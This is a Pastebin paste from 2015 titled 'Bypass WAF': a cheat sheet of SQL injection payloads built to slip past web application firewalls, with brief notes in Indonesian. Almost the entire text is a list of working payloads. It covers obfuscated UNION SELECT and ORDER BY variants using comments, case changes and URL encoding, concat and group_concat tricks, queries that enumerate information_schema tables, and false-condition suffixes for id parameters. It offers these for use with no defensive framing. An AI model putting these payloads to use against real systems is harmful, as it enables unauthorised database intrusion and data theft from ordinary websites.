Advertisement
virushsality

Bypass WAF

Aug 2nd, 2015
452
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.42 KB | None | 0 0
  1. ============================
  2. === BYPASS WAF BY VIRUSH ===
  3. ============================
  4.  
  5. === ORDER+BY ===
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /**/ORDER/**/BY/**/
  9. /*!order*/+/*!by*/
  10. /*!50000ORDER*//**//*!50000BY*/
  11. /*!12345ORDER*/+/*!BY*/
  12.  
  13.  
  14. === UNION+SELECT ===
  15. /*!UnIoN*/SeLecT+
  16. /*!union*/+/*!select*/
  17. union+/*!select*/
  18. uNiOn aLl sElEcT
  19. UNIunionON+SELselectECT
  20. /**/union/*!50000select*//**/
  21. 0%a0union%a0select%09
  22. %0Aunion%0Aselect%0A
  23. %55nion/**/%53elect
  24. /**/union/**/select/**/
  25. /**/uNIon/**/sEleCt/**/
  26. +%2F**/+Union/*!select*/
  27. /**//*!union*//**//*!select*//**/
  28. /*!uNIOn*/ /*!SelECt*/
  29. +union+distinct+select+
  30. +union+distinctROW+select+
  31. /*!00000Union*/ /*!00000Select*/
  32. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  33. %55nion %53elect
  34. %55nion(%53elect 1,2,3)-- -
  35. +union+distinct+select+
  36. +union+distinctROW+select+
  37. /**//*!12345UNION SELECT*//**/
  38. /**//*!50000UNION SELECT*//**/
  39. /**/UNION/**//*!50000SELECT*//**/
  40. /*!50000UniON SeLeCt*/
  41. union /*!50000%53elect*/
  42. + #?uNiOn + #?sEleCt
  43. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  44. /*!%55NiOn*/ /*!%53eLEct*/
  45. /*!u%6eion*/ /*!se%6cect*/
  46. +un/**/ion+se/**/lect
  47. uni%0bon+se%0blect
  48. %2f**%2funion%2f**%2fselect
  49. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  50. REVERSE(noinu)+REVERSE(tceles)
  51. /*--*/union/*--*/select/*--*/
  52. union (/*!/**/ SeleCT */ 1,2,3)
  53. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  54. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  55. %0A%09UNION%0CSELECT%10NULL%
  56. /*!union*//*--*//*!all*//*--*//*!select*/
  57. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  58. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  59. +UnIoN/*&a=*/SeLeCT/*&a=*/
  60. union+sel%0bect
  61. +uni*on+sel*ect+
  62. +#1q%0Aunion all#qa%0A#%0Aselect
  63. union(select (1),(2),(3),(4),(5))
  64. UNION(SELECT(column)FROM(table))
  65. %23akb%0AUnIOn%23akb%0ASeLecT+
  66. %23akb%0A%55nIOn%23akb%0A%53eLecT+
  67. union(select(1),2,3)
  68. union (select 1111,2222,3333)
  69. uNioN (/*!/**/ SeleCT */ 11)
  70. union (select 1111,2222,3333)
  71. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  72. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  73. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  74. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  75. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  76. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  77. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  78. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  79. /union\sselect/g
  80. /union\s+select/i
  81. /*!UnIoN*/SeLeCT
  82. +UnIoN/*&a=*/SeLeCT/*&a=*/
  83. +uni>on+sel>ect+
  84. +(UnIoN)+(SelECT)+
  85. +(UnI)(oN)+(SeL)(EcT)
  86. +�UnI�On�+'SeL�ECT�
  87. +uni on+sel ect+
  88. +/*!UnIoN*/+/*!SeLeCt*/+
  89. /*!u%6eion*/ /*!se%6cect*/
  90. uni%20union%20/*!select*/%20
  91. union%23aa%0Aselect
  92. /**/union/*!50000select*/
  93. /^.*union.*$/ /^.*select.*$/
  94. /*union*/union/*select*/select+
  95. /*uni X on*/union/*sel X ect*/
  96. +un/**/ion+sel/**/ect+
  97. +UnIOn%0d%0aSeleCt%0d%0a
  98. UNION/*&test=1*/SELECT/*&pwn=2*/
  99. un?<ion sel="">+un/**/ion+se/**/lect+
  100. +UNunionION+SEselectLECT+
  101. +uni%0bon+se%0blect+
  102. %252f%252a*/union%252f%252a /select%252f%252a*/
  103. /%2A%2A/union/%2A%2A/select/%2A%2A/
  104. %2f**%2funion%2f**%2fselect%2f**%2f
  105. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  106.  
  107. === concat() ===
  108. concat()
  109. CON%08CAT()
  110. CoNcAt()
  111. CoNcAt()
  112. %0AcOnCat()
  113. /**//*!12345cOnCat*/
  114. /*!50000cOnCat*/(/*!*/)
  115. unhex(hex(concat(table_name)))
  116. unhex(hex(/*!12345concat*/(table_name)))
  117. unhex(hex(/*!50000concat*/(table_name)))
  118.  
  119. === group_concat() ===
  120. /*!12345group_concat*/(/*!12345table_name*/)
  121. /*!50000group_concat*/(/*!50000table_name*/)
  122. /*!GrOuP_ConCaT*/()
  123. /*!12345GroUP_ConCat*/()
  124. /*!50000gRouP_cOnCaT*/()
  125. /*!50000Gr%6fuP_c%6fnCAT*/()
  126. /*!group_concat*/()
  127. gRoUp_cOnCAt()
  128. group_concat(/*!*/)
  129. group_concat(/*!12345table_name*/)
  130. group_concat(/*!50000table_name*/)
  131. /*!group_concat*/(/*!12345table_name*/)
  132. /*!group_concat*/(/*!50000table_name*/)
  133. unhex(hex(group_concat(table_name)))
  134. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  135. unhex(hex(/*!12345group_concat*/(table_name)))
  136. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  137. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  138. unhex(hex(/*!50000group_concat*/(table_name)))
  139. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  140. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  141. CONVERT(group_concat(table_name)+USING+latin1)
  142. CONVERT(group_concat(table_name)+USING+latin2)
  143. CONVERT(group_concat(table_name)+USING+latin3)
  144. CONVERT(group_concat(table_name)+USING+latin4)
  145. CONVERT(group_concat(table_name)+USING+latin5)
  146. convert(group_concat(table_name)+using+ascii)
  147. convert(group_concat(/*!table_name*/)+using+ascii)
  148. convert(group_concat(/*!12345table_name*/)+using+ascii)
  149. convert(group_concat(/*!50000table_name*/)+using+ascii)
  150.  
  151. === information_schema.tables ===
  152. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  153. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  154. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  155. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  156. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  157. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  158.  
  159. === Setelah Param ID Contoh id=1 +/*!and*/+1=0 ===
  160. +div+0
  161. Having+1=0
  162. +AND+1=0
  163. +/*!and*/+1=0
  164. and(1)=(0)
  165.  
  166. === Bypass error 505/timeout ===
  167. union(select+1)
  168. union%0bselect
  169. -gunakan %0b atau /**/
  170.  
  171. NB : Ketika -- atau --+- Tidak Bekerja, Maka Gunakan ;%00 Sebagai Penggantinya.
  172. Thanks To : Verry Darmawan (Sec7or)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement